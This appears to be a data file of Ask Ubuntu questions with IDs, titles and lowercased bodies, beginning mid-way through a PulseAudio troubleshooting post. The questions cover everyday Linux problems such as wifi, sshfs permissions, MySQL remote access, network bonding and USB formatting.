/lib/modules/3.2.0-29-generic-pae/kernel/sound/i2c/other/snd-tea575x-tuner.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/i2c/other/snd-ak4113.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/i2c/other/snd-pt2258.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/i2c/other/snd-ak4117.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/i2c/other/snd-ak4xxx-adda.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/i2c/other/snd-ak4114.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/i2c/snd-cs8427.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/i2c/snd-i2c.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/pci/emu10k1/snd-emu10k1-synth.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/pci/emu10k1/snd-emu10k1.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/pci/emu10k1/snd-emu10k1x.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/pci/korg1212/snd-korg1212.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/pci/au88x0/snd-au8830.ko /lib/modules/3.2.0-29-generic-pae/kernel/sound/pci/au88x0/snd-au8820.ko ... and 100+ more ( deleted to keep underneath the post limit ) $ ps -ef | grep pulseaudio lightdm 1698 1659 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog lightdm 1700 1698 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog lightdm 1701 1700 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1820 1800 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1822 1820 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1823 1822 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1956 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1979 1746 0 nov29 ? 00:00:00 /bin/sh /usr/bin/start-pulseaudio-x11 sean 1981 1980 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2289 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2330 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2339 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2348 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2357 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2374 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2387 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2410 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2450 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2489 1 0 nov29 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2627 2571 0 00:39 pts/1 00:00:00 grep -- color=auto pulseaudio ( i 'm logged in as `` sean '' ) update info : nov 30th here 's a sequence of terminal commands and output performed after a reboot . $ ps -ef | grep pulseaudio lightdm 1717 1681 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog lightdm 1719 1717 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog lightdm 1720 1719 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1840 1819 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1842 1840 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1843 1842 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1935 1765 0 12:20 ? 00:00:00 /bin/sh /usr/bin/start-pulseaudio-x11 sean 1952 1938 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1984 1969 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2427 2282 0 12:21 pts/2 00:00:00 grep -- color=auto pulseaudio $ pulseaudio -k ; killall -kill pulseaudio pulseaudio ( 1717 ) : operation not permitted pulseaudio ( 1719 ) : operation not permitted pulseaudio ( 1720 ) : operation not permitted $ ps -ef | grep pulseaudio lightdm 1717 1681 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog lightdm 1719 1717 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog lightdm 1720 1719 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1843 1 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2449 2282 0 12:22 pts/2 00:00:00 grep -- color=auto pulseaudio $ sudo pulseaudio -k ; killall -kill pulseaudio [ sudo ] password for sean : e : [ pulseaudio ] core-util.c : home directory /home/sean not ours . e : [ pulseaudio ] main.c : failed to kill daemon : permission denied pulseaudio ( 1717 ) : operation not permitted pulseaudio ( 1719 ) : operation not permitted pulseaudio ( 1720 ) : operation not permitted $ ps -ef | grep pulseaudio lightdm 1717 1681 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog lightdm 1719 1717 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog lightdm 1720 1719 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1843 1 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 2475 2282 0 12:23 pts/2 00:00:00 grep -- color=auto pulseaudio ( ca n't seem to get that formatted right , but it 's the same as above - running as sudo did n't kill extra processes ) $ pavucontrol this opens a window now ( without the killall command above , it would just hang ) but the window just says `` establishing connection to pulseaudio . please wait ... '' indefinitely also , after the killall command is executed : now the volume control ( by the clock ) works i get a drop-down with a volume slider , rhythmbox , and sound settings ... i can now access sound settings without freezing up the window , either from system settings ... - > sound , or , the volume control drop-down above . but , in the sound settings window ... '' output volume slider '' is disabled/greyed '' test sound '' button does nothing '' play sound through '' box is empty '' record sound through '' box is empty $ sudo pulseaudio -k ; sudo killall -kill pulseaudio e : [ pulseaudio ] core-util.c : home directory /home/sean not ours . e : [ pulseaudio ] main.c : failed to kill daemon : permission denied $ ps -ef | grep pulseaudio lightdm 1720 1 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 1843 1 0 12:20 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog sean 6233 6165 0 18:20 pts/5 00:00:00 grep -- color=auto pulseaudio`
223553	automatically connect to a hidden wireless network ?	maybe i 'm just missing something , but in precise and quantal i have n't been able to figure out how to automatically connect to a hidden wireless network . how can i enable this from within the network manager ? i do n't want to just add a custom startup script as this is a laptop and i do n't startup/shutdown very often ( suspend and hibernate are better alternatives during the day ) .
223554	using acls with sshfs	i 've been working on setting up a home fileserver for my family . i use samba over the lan and sshfs for anyone connecting via the internet . so far samba is working perfectly and sshfs works , but files created/copied with sshfs have the wrong permissions . i have a separate partition where files are stored with a structure like : user a user b shared i use acls so that the different users can see and access but not change files in each other 's folders , but everyone can see and edit files in the shared folder . additionally , i have set the acl defaults such that any folders and files that are created or copied into the folders on the server inherit the proper permissions . this works fine with samba , but when i connect via sshfs any files created or copied to the server keep the client 's permissions . is there an option to correct this when i mount the server 's drive via sshfs ? or does sshfs simply not support acls ? if the latter , is there a workaround/patch/alternative ? thanks in advance , and let me know if you need any more information . additional information : all users have local ( on the server ) accounts all users have the same primary group all users can connect via ssh and sshfs with public keys with samba , if a client folder has , say , drwx -- -- -- permissions and i copy it to the shared folder , it 's permissions ( for the contents as well ) will be changed to drwxrwxrwx ( which is what i want ) , and if copied to a user file they will change to drwxr-x -- - edit : tried switching back to passwords instead of public keys for ssh and sshfs as per garybishop 's suggestion .
223557	synonyms for different languages in libreoffice writer ?	when setting a text for english us the context menu contains 'synonyms' this is not the case for the other languages for which i have the spelling installed ( english uk , french etc ) can i have the synonyms option for uk english too , for example ? even that is a problem although there seems to be solutions around for it . here , for example , ( which is a link to here ) but after testing it can not see synonyms for uk . what about other languages ? please notice that this question is not just about english-uk . i have initially noticed that 'synonyms ' where missing in relation to british , but i am asking about how to solve the issue in general or , when there is no general solution , how to solve it on a case-by-case basis . for the meta consequence of all this , involving the issue of it being a duplicate , see comments under here and these meta questions , here and here . the british-related question to which this was flagged as duplicate involves a particular bug and therefore its solution can not be appropriate to a question that goes beyond that particular case . )
223558	how do i connect to a root vnc session ?	i installed the unity desktop and tightvnc using these directions . the window comes up in vnc , although because i 'd started the vnc server as root , i seem to be logged in as 'guest ' . please note that at the moment i only have console access as either guest or via ssh ; i do n't have physical access to the machine to login as root and make changes in the gui . i 've been starting the vnc server as root . in the top right of the screen , it displays that i am logged in as guest . by clicking on guest , i can select another user to log in as , but it does n't prompt me -- it simply turns the screen black for a second and kicks me back to the guest user . i 'm using gdm , gnome ( using the unity 2d skin , i think , but i do n't use guis much ) , and tightvnc . this server is hidden deep inside a private network and i 'm not too worried about the security risks of connecting to vnc and getting a root shell .
223560	see output from another user account	so here 's the setup : i have a remote computer running a program directly in cli from user account nn . if i ssh into the same user account nn , is it possible to see the output of the program running in the first user account instance from the second instance ?
223562	technical items missing labels , buttons and descriptions	whenever i search for something on the ubuntu software center , the technical results are missing labels and descriptions . as shown here , i tried reinstalling it using synaptic , but that did not help . i also tried rebooting . any ideas ?
223563	my laptop forgets everything done in the session after shutting down	i am running ubuntu 12.04 from a 16gb kingston sdhc card because my hard disk died . some days ago i started noticing that the files i stored in a session were lost after shutting down and turning on it again , btw the sd card still has like 7gb free . it 's like my laptop only had temporary memory and every thing done in the last session is lost after shutting down . edit : it 's a full install .
223565	how do i stop color changes when quitting vi from a terminal emulator ?	i have a problem with colors when using vi under ubuntu 12.04 . i 'm connecting to my ubuntu server from a pc , using powerterm terminal emulation software . i have powerterm set up to display black text on a grey background . when i connect to the ubuntu box , the screen is fine . when i open a file with vi , the screen is fine . the text is black on a gray background , which is normal for my powerterm setup . however , if the file is less than a full screen long , the remainder of the screen is a black background . when i quit vi , the entire background turns black , and the text becomes white . i have to do a terminal reset to restore my normal text and background colors . what i want is for there to be no change at all when i use vi . the text should be black and the background grey . i have another server loaded with redhat 9 , and that acts normally ; colors donât change when using vi . here is my .vimrc file : set compatible syntax off let g : loaded_matchparen=1 set nocp set noincsearch set nohlsearch set noshowmatch set bg=dark i 've tried set bg=dark and set bg=light . it makes no difference . is there some other set command that would clear this up for me , or some term setting ( my term is set to linux ) ?
223567	how to tinker with /dev contents	when i do ls for /dev ; i get the following output loop5 sda tty24 tty58 ttys4 .. loop6 sda1 tty25 tty59 ttys5 alarm loop7 sda2 tty26 tty6 ttys6 ashmem loop-control sda3 tty27 tty60 ttys7 autofs mapper sda4 tty28 tty61 ttys8 binder mcelog sda5 tty29 tty62 ttys9 block mem sda6 tty3 tty63 ttyusb0 bsg net sdb tty30 tty7 ttyusb1 btrfs-control network_latency serial tty31 tty8 ttyusb2 bus network_throughput sg0 tty32 tty9 ttyusb3 cdrom null sg1 tty33 ttyprintk ttyusb4 cdrw oldmem sg2 tty34 ttys0 .udev char port shm tty35 ttys1 uinput console ppp snapshot tty36 ttys10 urandom core psaux snd tty37 ttys11 v4l cpu ptmx sr0 tty38 ttys12 vcs cpu_dma_latency pts stderr tty39 ttys13 vcs1 disk ram0 stdin tty4 ttys14 vcs2 dri ram1 stdout tty40 ttys15 vcs3 dvd ram10 tty tty41 ttys16 vcs4 dvdrw ram11 tty0 tty42 ttys17 vcs5 ecryptfs ram12 tty1 tty43 ttys18 vcs6 fb0 ram13 tty10 tty44 ttys19 vcsa fd ram14 tty11 tty45 ttys2 vcsa1 full ram15 tty12 tty46 ttys20 vcsa2 fuse ram2 tty13 tty47 ttys21 vcsa3 fw0 ram3 tty14 tty48 ttys22 vcsa4 hpet ram4 tty15 tty49 ttys23 vcsa5 .initramfs ram5 tty16 tty5 ttys24 vcsa6 input ram6 tty17 tty50 ttys25 vga_arbiter kmsg ram7 tty18 tty51 ttys26 vhost-net log ram8 tty19 tty52 ttys27 video0 loop0 ram9 tty2 tty53 ttys28 zero loop1 random tty20 tty54 ttys29 loop2 rfkill tty21 tty55 ttys3 loop3 rtc tty22 tty56 ttys30 loop4 rtc0 tty23 tty57 ttys31 i would like to understand the meaning of the entries listed here . is there a manual available to help me understand this ?
223572	palm centro not even appearing on desktop	background : i 'm trying to set up my dad 's new installation of xubuntu 12.10 ( i finally got him to switch from windows : -d ) so he can sync his palm centro on his computer . i installed j-pilot , but the problem is that his palm is n't even showing up anywhere on the computer . when it 's plugged in , it lit up and began to charge when i told it to try and sync with the computer , but it failed the sync and xubuntu still does n't recognize it . question : does anyone know how i can get his palm to be recognized by xubuntu ?
223577	why did n't virtual ubuntu halts clearly ?	i am running ubuntu 11.10 on oracle virtual box 4.2.4 under windows 7 x64 . to stop guest system i often use halt command which works fine on physical machines . but it looks hanging on virtual ubunty . after halt it starts shutting down , ubuntu logo appears with dots below flashing . after some cycles it just stops . vm manager does not feel machine is gone , so i need to power off it . p.s . the system stops ok if i shutdown it via gui .
223578	problem with uploading files to lamp server	i have installed lamp server using such command : sudo apt-get install apache2 apache2-mod-php5 php5 mysql-server phpmyadmin i opened localhost and it said 'it works ! ' . i also opened localhost/phpmyadmin and it says 404 ... anyway its not the biggest problem . the biggest one is that i cant even upload files to it . i go to system files - > var - > www . i see here index.html . i can only read it ( readonly ) and ca n't save it to apply changes . i cant even add any files to www folder ! when i try to ( open text editor , write some script and save it in www folder ) it gives me an error ( something that i cant save files in this directory ) . please help me solving this problem . im trying to for few days i have reinstalled whole ubuntu few times , and still nothing.. greetings
223579	changing gimp 's default startup option	when i open gimp , i would like it to appear in maximized single-window mode . is there a way i can do this , either with a shell script or preferences option ?
223582	where are my apps ?	when i click on the dash icon in ubuntu 12.10 , it shows me some `` applications '' , but only eight of them . where are the other apps ? how can i browse for `` system '' , `` programming '' , `` multimedia '' and other sections to find and install tons of apps ? i do n't want to type to the search bar , i want to locate all the apps with a couple of clicks like in metacity and gnome 2 .
223585	convert video file to .ogg	i 've been having trouble with this because i 'm new to linux : i would like to convert different video formats to ogv . i found some terminal commands like this : ffmpeg -i input.avi -acodec libvorbis -ac 1 -b 768k output.ogg the problem with these type of commands is that they are intended to change bit rate , fps , or even resolution . i would like to just change the file format without changing anything else about the video . i looked at the man pages for ffmpeg and found some useful info but i do n't know how to space command-line options . are there any easy ways to do this ? in addition , is there a command to change the bit rate so that it does n't go over a certain rate ?
223590	dual booting ubuntu and windows 7 and can only pick up my home wifi network	ijust recently installed ubuntu 12.10 and it connected to my home wifi right away . problem arose when i went to school which has atleast 3 unlocked wifi networks , i checked using windows where the wireless is working fine . anywhere but at my home wifi , ubuntu wont pick up or even list anyother wifi networks . my wireless card is ar9285 wireless network adapter and the computer is a acer aspire 4339
223592	how to make login keyring forget a password	the `` unlock login keyring '' popup is useful , but how do i make it forget a password for a specific website ?
223596	how to use a different partition in ubuntu	i had partitioned my hard disk when i was installing ubuntu 12.04 , i made two partitions one of 80gb and another one of 140gb . but for some reason by default it only uses sda1 as show in this snapshot . i have installed virtualbox and running windows_xp and i am willing to use sda5 the other partition . any ideas how can i do this . any help will be appreciated regards
223598	how to format a usb stick	my usb stick looks dead : victor @ x301a1 : ~ $ umount /dev/sdc1 victor @ x301a1 : ~ $ sudo mkfs -t vfat /dev/sdc1 mkfs.vfat 3.0.12 ( 29 oct 2011 ) mkfs.vfat : unable to open /dev/sdc1 : read-only file system victor @ x301a1 : ~ $ sudo hdparm -r0 /dev/sdc1 /dev/sdc1 : setting readonly to 0 ( off ) readonly = 0 ( off ) victor @ x301a1 : ~ $ sudo fsck -n /dev/sdc1 fsck de util-linux 2.20.1 dosfsck 3.0.12 , 29 oct 2011 , fat32 , lfn /.trash-1000/files/sans_titre start does point to root directory . deleting dir . /.trash-1000/files/bus can start does point to root directory . deleting dir . reclaimed 190903 unused clusters ( 781938688 bytes ) . free cluster summary wrong ( 1001897 vs. really 1383698 ) auto-correcting . leaving file system unchanged . /dev/sdc1 : 8052 files , 566660/1950358 clusters is there anyway for me to recover my usb stick ? thank
223601	network bonding is n't working correctly	hey guys i 'm having trouble setting up ubuntu bonding , following this guide . my interfaces file looks like this : auto eth0 iface eth0 inet manual bond-master bond0 auto eth1 iface eth1 inet manual bond-master bond0 auto bond0 auto iface inet static address 10.1.10.30 netmask 255.255.255.0 dns-nameservers 10.1.10.50 gateway 10.1.10.2 bond-mode balance-rr bond-miimon 100 bond-lacp-rate 1 bond-slaves none i can ping google and my external static ip from another computer on another isp ( i assigned it a static one-to-one nat address with the router and also disabled the router 's firewall for troubleshooting ) . however , from the ubuntu machine , i ca n't ping it 's gateway 10.1.10.2 ( even though it uses it to get to google lol ) and i ca n't ping any other internal address . if i comment out the bonding and only use eth0 or eth1 everything works just fine . any thoughts ?
223602	issues mounting wd 320 external in 12.10	so , i 'm a brand new user to this os . i 'm trying to access my external western digital mybook 320gb usb hd , but the automount feature is n't working . i 've read and attempted several suggestions from users who have had similar problems , but their resolve does n't work for me . so , pertinent information.. ubuntu 12.10 vanilla in a 1.5 tb single os system . this was a fresh boot , so there was no windows/mac os present to argue with the system . a copy of sudo fdisk -l : disk /dev/sda : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0007b941 device boot start end blocks id system /dev/sda1 * 2048 2922149887 1461073920 83 linux /dev/sda2 2922151934 2930276351 4062209 5 extended /dev/sda5 2922151936 2930276351 4062208 82 linux swap / solaris disk /dev/sdb : 251 mb , 251641856 bytes 8 heads , 60 sectors/track , 1023 cylinders , total 491488 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system my nook is plugged in to the usb and it auto-mounted with no issues . that device lists fine , and is accessed without argument . going into my bios the boot priority options shows the internal drive , cd/dvd , and an external device ( i 'm assuming this is the wd ) but , i ca n't `` see '' it from dash , terminal or mountmanager . it 's been a bit since i had this unit hooked into a pc , but if i 'm not mistaken it 's running an ntsf file system . i do know the drive works , because i can plug it into my xbox and the video player can see the movies and photos that are in the drive ( and yes , it will play them , so reading the disk is no problem either ) so , my question i suppose , is what terminal code , program , app ... magic wand do i need to use to make ubuntu see the drive and allow me to use it ? if you need any further information ... just ask and tell me how to get it and i 'll post it asap . thanks !
223606	how to install ubuntu to a lenovo r61 that has windows installed but not activated ?	i have my old lenovo r61 thinkpad with a new harddrive and windows xp installed but not activated since my windows product key expired after graduation or somthing like that . i would like to start using ubuntu but i can not figure out how to install ubuntu onto my thinkpad without a currently opperating os . i already downloaded ubuntu 12.10 to a usb from my desktop . now what ? please help ! it will save me a great deal of frustration .
223611	upgrade kubuntu 11.10 to 12.10 i get error code that 11.10 is outdated	i installed kubuntu 11.10 on top of windows 7 . everything works fine . i tried to update 11.10 to 12.10 and i get error code that 11.10 is outdated and not supported . update stops . i downloaded 12.10 iso but there is no upgrade option , just install . how can i remove the 11.10 installation and install 12.10 . ( without breaking my windows 7 install . ) i need dual boot option . thanks for the support . bobby d .
223613	cat all files in a directory , with a specific file at the beginning an end ... ?	is there a way to cat all files in a given directory , but with a particular file at the beginning and end ? for example , say i have : file1.js , file2.js , file3.js , file4.js , file5.js -- effectively i would like to cat file2.js file*.js file3.js > /var/www/output.js i 've tried a few variations of these find ! -name `` file2.js '' ! -name `` file3.js '' -type f -exec cat file2.js { } file3.js > /var/www/js/output.js \ ; find ! -name `` file2.js '' ! -name `` file3.js '' -type f | xargs -i files cat file2.js files file3.js > /var/www/output.js but the best i can get out of it is file2.js added before and file3.js added after all other files ( multiple times ) i know i could specify the files in the order i wanted manually , but this is not maintainable ( i 'm expecting , potentially > 100 files ) . i have looked through man cat , as well as a handful of websites devoted to xargs , find and cat to no avail . thanks in advance .
223616	error 1130 connecting to mysql on ubuntu server 12.04	i hope this is the right place for this ... i currently am running ubuntu server 12.04 through virtualbox on a windows 7 host . i am trying to connect to the vm 's mysql engine using mydb studio for mysql , and when i enter my mysql login credentials , it gives me the following error back : error 1130 : host '192.168.56.1 ' is not allowed to connect to this mysql server i am running the vm with adapter 1 enabled for nat , and adapter 2 enabled for host-only adapter . eth0 10.0.2.15 and eth1 192.168.56.21 . i can connect to apache at 192.168.56.21 , and through phpmyadmin , everything works as it should . i did edit the /etc/mysql/my.cnf file and commented out the line bind-address = 127.0.0.1 by adding a # in front of it - i thought that this should have allowed remote connections . any ideas on how i can solve this ? what could be wrong ? edit : i am trying to connect as 'root ' . edit : solved ! !
223617	using isight camera in macbookpro ( 8,2 ) on ubuntu 12.04 virtualbox vm	i 'm having a lot of trouble using the built-in isight camera on my macbookpro8,2 ( early 2011 ) from an ubuntu 12.04 virtual machine , run inside virtualbox . the following is the log i get when i try to run guvcview ubuntu @ ubuntu : ~ $ guvcview guvcview 1.5.3 alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.rear alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.center_lfe alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.side alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.surround71 alsa lib setup.c:565 : ( add_elem ) can not obtain info for ctl elem ( mixer , 'iec958 playback default',0,0,0 ) : no such file or directory alsa lib setup.c:565 : ( add_elem ) can not obtain info for ctl elem ( mixer , 'iec958 playback default',0,0,0 ) : no such file or directory alsa lib setup.c:565 : ( add_elem ) can not obtain info for ctl elem ( mixer , 'iec958 playback default',0,0,0 ) : no such file or directory alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.hdmi alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.hdmi alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.modem alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.modem alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.phoneline alsa lib pcm.c:2217 : ( snd_pcm_open_noupdate ) unknown pcm cards.pcm.phoneline alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib audio/pcm_bluetooth.c:1614 : ( audioservice_expect ) bt_get_capabilities failed : input/output error ( 5 ) alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream can not connect to server socket err = no such file or directory can not connect to server socket jack server is not running or can not be started video device : /dev/video0 init . facetime hd camera ( built-in ) ( location : usb-0000:00:0b.0-1 ) { pixelformat = 'yuyv ' , description = 'yuv 4:2:2 ( yuyv ) ' } { discrete : width = 160 , height = 120 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 176 , height = 144 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 320 , height = 240 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 352 , height = 288 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 640 , height = 480 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 1/10 , { pixelformat = 'mjpg ' , description = 'mjpeg ' } { discrete : width = 960 , height = 540 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1024 , height = 576 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { pixelformat = 'rgb3 ' , description = 'rgb3 ' } { discrete : width = 160 , height = 120 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 176 , height = 144 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 320 , height = 240 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 352 , height = 288 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 640 , height = 480 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 960 , height = 540 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1024 , height = 576 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { pixelformat = 'bgr3 ' , description = 'bgr3 ' } { discrete : width = 160 , height = 120 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 176 , height = 144 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 320 , height = 240 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 352 , height = 288 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 640 , height = 480 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 960 , height = 540 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1024 , height = 576 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { pixelformat = 'yu12 ' , description = 'yu12 ' } { discrete : width = 160 , height = 120 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 176 , height = 144 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 320 , height = 240 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 352 , height = 288 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 640 , height = 480 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 960 , height = 540 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1024 , height = 576 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { pixelformat = 'yv12 ' , description = 'yv12 ' } { discrete : width = 160 , height = 120 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 176 , height = 144 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 320 , height = 240 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 352 , height = 288 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 640 , height = 480 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1280 , height = 720 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 960 , height = 540 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , { discrete : width = 1024 , height = 576 } time interval between frame : 100/2997 , 1/25 , 1/24 , 1/15 , vid:05ac pid:8509 driver : uvcvideo checking format : 1196444237 vidioc_g_comp : : invalid argument compression control not supported fps is set to 1/25 drawing controls no codec detected for h264 no codec detected for mp3 - ( lavc ) checking video mode 960x540 @ 32bpp : ok could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable could not grab image ( select timeout ) : resource temporarily unavailable write /home/ubuntu/.guvcviewrc ok free controls cleaned allocations - 100 % closing portaudio ... ok closing gtk ... ok ubuntu @ ubuntu : ~ $ any help would be greatly appreciated . only clue i have is that i initially was having problems , tried using the old method of fixing isights ( involving installing isight-firmware-tools ) before realizing that i just had n't turned on the vm setting to allow the vm to access the webcam . : ) anyway , i wonder if installing that messed something up . however , i think this is a red herring because i 've : shut down and turned back on the mac , restarted the vm , tried a different vm ( for which i never installed isight-firmware-tools , and created an entirely new ubuntu vm . all instances have had this problem . similarly , other viewers , such as cheese , avplay , avconv have had all various kinds of errors .
223621	do n't show mounted folders on start	ubuntu opens a nautilus for every mounted windows share right after login . how can i suppress this ? it 's ubuntu 12.10 and filesystem is cifs . thanks in advance .
